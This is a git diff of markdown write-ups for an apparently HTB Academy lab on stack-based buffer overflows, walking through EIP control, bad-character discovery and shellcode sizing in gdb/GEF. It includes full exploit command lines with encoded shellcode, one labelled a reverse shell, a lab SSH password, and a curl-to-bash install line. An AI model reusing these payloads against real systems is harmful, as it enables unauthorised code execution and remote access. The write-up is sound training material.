B1rby · B1rby · Dec 14, 2021 · Dec 14, 2021 · Dec 14, 2021 · Dec 14, 2021
diff --git a/Determine the Length for Shellcode Section.md b/Determine the Length for Shellcode Section.md
@@ -0,0 +1,9 @@
+# Determine the Length for Shellcode
+![Pasted image 20211127183951](https://user-images.githubusercontent.com/87600765/146053798-c6feaf70-04b1-4be8-96f8-9cea6718698c.png)
+
+### We can see that in this image we have 100 bytes of NOPS and 150 bytes of shellcode. 
+![Pasted image 20211127184029](https://user-images.githubusercontent.com/87600765/146053860-16e86e3b-cd86-45e6-af27-8728fc816287.png)
+
+### We just have to do 100 + 150 = 250 bytes 
+
+![Pasted image 20211127184108](https://user-images.githubusercontent.com/87600765/146053936-226a7f4a-288f-40de-a2c1-dc791623914f.png)
diff --git a/Generating Shellcode Section.md b/Generating Shellcode Section.md
@@ -0,0 +1,19 @@
+# Generating Shellcode Section
+![image](https://user-images.githubusercontent.com/87600765/146055566-e28fb669-89e6-4e43-acf8-783258527b48.png)
+```nasm
+run $(python -c 'print "\x55" * 817 + "\x90" * 124 + "\xba\xff\xce\xd4\x94\xda\xd4\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x12\x31\x53\x12\x83\xeb\xfc\x03\xac\xc0\x36\x61\x63\x06\x41\x69\xd0\xfb\xfd\x04\xd4\x72\xe0\x69\xbe\x49\x63\x1a\x67\xe2\x5b\xd0\x17\x4b\xdd\x13\x7f\x33\x1d\xe4\x7e\xa3\x1f\xe4\xfa\x5a\xa9\x05\x4a\xfa\xf9\x94\xf9\xb0\xf9\x9f\x1c\x7b\x7d\xcd\xb6\xea\x51\x81\x2e\x9b\x82\x4a\xcc\x32\x54\x77\x42\x96\xef\x99\xd2\x13\x3d\xd9" + "\x66" * 4')
+```
+After executing this command we want to know the stack size after overwriting eip.
+```nasm
+info proc all
+```
+`info proc all` shows all the information about the process described under all of the above `info proc` subcommands.
+We will have this 
+```nasm
+...<SNIP>...
+0xfffdd000 0xffffe000    0x21000        0x0 [stack]
+...<SNIP>...
+```
+So the stack size is `0x21000`.
+
+![Pasted image 20211204083730](https://user-images.githubusercontent.com/87600765/146055707-6195069e-4cbf-41ce-89dc-a778a36f6216.png)
diff --git a/Identification of Bad Characters Section.md b/Identification of Bad Characters Section.md
@@ -0,0 +1,45 @@
+# Identification of Bad Characters Section
+
+![image](https://user-images.githubusercontent.com/87600765/146062068-27f43e9a-476f-4d91-9d9f-b02b562e665f.png)
+
+We have to search the other bad characters. We know that  `\x00`, `\x09` and `\x0a` are bad characters so the chars's size after removed bad characters is: 
+```md
+Buffer = "\x55" * (1040 - 253 - 4) = 783
+```
+```nasm
+gef➤  break bowfunc
+Breakpoint 1 at 0x11ad
+gef➤  run $(python -c "print '\x55' * 783 + '\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' + '\x66' * 4")
+```
+This is the examination of esp. 
+```nasm
+0xffffd642:     0x55    0x55    0x55    0x55    0x55    0x55    0x55    0x55
+0xffffd64a:     0x55    0x55    0x55    0x55    0x55    0x01    0x02    0x03
+0xffffd652:     0x04    0x05    0x06    0x07    0x08    0x0b    0x0c    0x0d
+0xffffd65a:     0x0e    0x0f    0x10    0x11    0x12    0x13    0x14    0x15
+0xffffd662:     0x16    0x17    0x18    0x19    0x1a    0x1b    0x1c    0x1d
+0xffffd66a:     0x1e    0x1f    0x00    0x21    0x22    0x23    0x24    0x25
+```
+Note: `x/2000xb $esp` is a command for examine the register esp.
+- the first x is for examine
+- 2000 is the number of units we want to display
+- the second x is for display in hexadecimal
+- the b is for display a single byte
+
+We can see in this part that we encounter `\x00` instead of `\x20`. So now we have to retire `\x20` because it's a bad character. 
+
+```md
+# Substract the number of removed characters
+Buffer = "\x55" * (1040 - 251 - 4) = 784	
+
+# "\x00" & "\x09" & "\x0a" & "\x20" removed: 256 - 4 = 252 bytes
+ CHARS = "\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b...<SNIP>...\xfd\xfe\xff" 
+
+   EIP = "\x66" * 4
+```
+Now we have to check if there are others bad characters.
+```nasm
+run $(python -c "print '\x55' * 784 + '\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' + '\x66' * 4")
+```
+After this we can see that they are no null byte on our character array anymore, we can put all the bad characters that we found as the answer.
+![Pasted image 20211203162721](https://user-images.githubusercontent.com/87600765/146054975-0dbfe1f9-b81c-479c-b294-08ec0dca7ae5.png)
diff --git a/LICENSE b/LICENSE
diff --git a/README.md b/README.md
diff --git a/Reverse shell.md b/Reverse shell.md
@@ -0,0 +1,12 @@
+## Reverse shell
+```nasm
+run $(python -c 'print "\x55" * 817 + "\x90" * 124 + "\xda\xd6\xd9\x74\x24\xf4\xbd\xad\xe4\xfa\x61\x58\x29\xc9\xb1\x12\x83\xc0\x04\x31\x68\x13\x03\xc5\xf7\x18\x94\x24\x23\x2b\xb4\x15\x90\x87\x51\x9b\x9f\xc9\x16\xfd\x52\x89\xc4\x58\xdd\xb5\x27\xda\x54\xb3\x4e\xb2\x19\x43\xb1\x43\x8e\x41\xb1\x39\x27\xcf\x50\x0d\xd1\x9f\xc3\x3e\xad\x23\x6d\x21\x1c\xa3\x3f\xc9\xf1\x8b\xcc\x61\x66\xfb\x1d\x13\x1f\x8a\x81\x81\x8c\x05\xa4\x95\x38\xdb\xa7" + "\x4c\xd6\xff\xff"')
+ ``` 
+![Pasted image 20211212185019](https://user-images.githubusercontent.com/87600765/146056009-8a100748-3245-4639-af9c-451f82e6ed79.png)
+
+ I also realized that HTB did an error in their module. They wrote: 
+ ```shell-session
+Buffer = "\x55" * (1040 - 124 - 95 - 4) = 817
+```
+But 1040 - 124 - 95 - 4 = 817 so be sure to put 817.
+
diff --git a/Stack-Based Buffer Overflow Section.md b/Stack-Based Buffer Overflow Section.md
@@ -0,0 +1,76 @@
+# Stack Based Buffer Overflow Question
+![Pasted image 20211120110142](https://user-images.githubusercontent.com/87600765/146052141-a62f3af8-fa2f-40da-a151-fb0f02535bfe.png)
+#### Connection
+Before  we answer this question, you need to connect to your vpn first. Click on `get-vpn-key` and then click on download. Then go to your terminal at the path you downloaded your vpn and do: 
+```nasm
+$ sudo openvpn academy.ovpn
+``` 
+If all happened correctly you should have at the end of the output:
+```nasm
+Initialization Sequence Completed
+```
+Then you need to connect to the target machine. 
+```nasm
+$ sudo ssh htb-student@ip
+```
+ And then you put the password
+ ```nasm
+ HTB_@cademy_stdnt!
+ ```
+#### Answer
+ Nice ! Then if you do ls you will see a bow file. 
+ ```nasm
+$ ls
+bow
+``` 
+ So you need to find at which adress in the `main function` the`bowfunc function` is called.  So with gdb you will have to disassembl main. 
+ ```nasm
+ gdb -q bow
+Reading symbols from bow...(no debugging symbols found)...done.
+(gdb) disassembl main
+Dump of assembler code for function main:
+   0x00000582 <+0>:     lea    0x4(%esp),%ecx
+   0x00000586 <+4>:     and    $0xfffffff0,%esp
+   0x00000589 <+7>:     pushl  -0x4(%ecx)
+   0x0000058c <+10>:    push   %ebp
+   0x0000058d <+11>:    mov    %esp,%ebp
+   0x0000058f <+13>:    push   %ebx
+   0x00000590 <+14>:    push   %ecx
+   0x00000591 <+15>:    call   0x450 <__x86.get_pc_thunk.bx>
+   0x00000596 <+20>:    add    $0x1a3e,%ebx
+   0x0000059c <+26>:    mov    %ecx,%eax
+   0x0000059e <+28>:    mov    0x4(%eax),%eax
+   0x000005a1 <+31>:    add    $0x4,%eax
+   0x000005a4 <+34>:    mov    (%eax),%eax
+   0x000005a6 <+36>:    sub    $0xc,%esp
+   0x000005a9 <+39>:    push   %eax
+   0x000005aa <+40>:    call   0x54d <bowfunc>
+   0x000005af <+45>:    add    $0x10,%esp
+   0x000005b2 <+48>:    sub    $0xc,%esp
+   0x000005b5 <+51>:    lea    -0x1974(%ebx),%eax
+   0x000005bb <+57>:    push   %eax
+   0x000005bc <+58>:    call   0x3e0 <puts@plt>
+   0x000005c1 <+63>:    add    $0x10,%esp
+   0x000005c4 <+66>:    mov    $0x1,%eax
+   0x000005c9 <+71>:    lea    -0x8(%ebp),%esp
+   0x000005cc <+74>:    pop    %ecx
+   0x000005cd <+75>:    pop    %ebx
+   0x000005ce <+76>:    pop    %ebp
+   0x000005cf <+77>:    lea    -0x4(%ecx),%esp
+---Type <return> to continue, or q <return> to quit---q
+```
+This is in AT&T syntax but if you want Intel syntax, you just need to do
+```nasm
+(gdb) set disassembly-flavor intel
+``` 
+The first thing that we have to do is to look for a `call` instruction. So we have 
+```nasm
+0x00000591 <+15>:    call   0x450 <__x86.get_pc_thunk.bx>
+0x000005aa <+40>:    call   0x54d <bowfunc>
+0x000005bc <+58>:    call   0x3e0 <puts@plt>
+```
+Now it's pretty intuitive because you can see in Operation Suffixes the name of the function called. 
+```nasm
+0x000005aa <+40>:    call   0x54d <bowfunc>
+```
+![Pasted image 20211120110235](https://user-images.githubusercontent.com/87600765/146052243-266536f7-2d6b-41f9-ad2f-6c711afa8c38.png)
diff --git a/Take Control of EIP Section.md b/Take Control of EIP Section.md
@@ -0,0 +1,51 @@
+# Take Control of EIP Section
+![Pasted image 20211127181005](https://user-images.githubusercontent.com/87600765/146052962-3bb254ec-a803-452b-af8b-1211167f5a87.png)
+ Now we know that eip can be overwritten with 1036 + 4 bytes we can verify it with this command:
+```nasm
+gef➤  run $(python -c "print '\x55' * 1036 + '\x66' *4")
+Starting program: /mnt/c/Users/Jojo/documents/testcode/bow32 $(python -c "print '\x55' * 1036 + '\x66' *4")
+
+Program received signal SIGSEGV, Segmentation fault.
+0x66666666 in ?? ()
+[ Legend: Modified register | Code | Heap | Stack | String ]
+───────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+$eax   : 0x1
+$ebx   : 0x55555555 ("UUUU"?)
+$ecx   : 0xffffd750  →  0x4e414c00
+$edx   : 0xffffd0f0  →  0xffffd300  →  0x149dc001
+$esp   : 0xffffd0f0  →  0xffffd300  →  0x149dc001
+$ebp   : 0x55555555 ("UUUU"?)
+$esi   : 0xf7fb2000  →  0x001e9d6c
+$edi   : 0xf7fb2000  →  0x001e9d6c
+$eip   : 0x66666666 ("ffff"?)
+$eflags: [zero carry parity adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
+$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
+───────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+0xffffd0f0│+0x0000: 0xffffd300  →  0x149dc001    ← $esp
+0xffffd0f4│+0x0004: 0xffffd1c4  →  0xffffd315  →  "/mnt/c/Users/Jojo/documents/testcode/bow32"
+0xffffd0f8│+0x0008: 0xffffd1d0  →  0xffffd751  →  "LANG=en_US.UTF-8"
+0xffffd0fc│+0x000c: 0x565561f2  →  <main+20> add ebx, 0x2e0e
+0xffffd100│+0x0010: 0xffffd120  →  0x00000002
+0xffffd104│+0x0014: 0x00000000
+0xffffd108│+0x0018: 0x00000000
+0xffffd10c│+0x001c: 0xf7de6fd6  →  <__libc_start_main+262> add esp, 0x10
+─────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
+[!] Cannot disassemble from $PC
+[!] Cannot access memory at address 0x66666666
+─────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+[#0] Id 1, Name: "bow32", stopped 0x66666666 in ?? (), reason: SIGSEGV
+───────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+```
+
+We can see that the adress of EBP is `0x55555555`. You can also do 
+```shell-session
+gef➤  i r ebp
+ebp            0x55555555          0x55555555
+```
+![Pasted image 20211127182110](https://user-images.githubusercontent.com/87600765/146053541-9aaf3e24-d21b-45b8-bdda-ee5601dad527.png)
+
+The tool I used is call GEF. GEF is a set of commands for x86/64, ARM, MIPS, PowerPC and SPARC to assist exploit developers and reverse-engineers when using old school GDB. It provides additional features to GDB using the Python API to assist during the process of dynamic analysis and exploit development. If you want to install it do 
+```nasm
+bash -c "$(curl -fsSL http://gef.blah.cat/sh)"
+```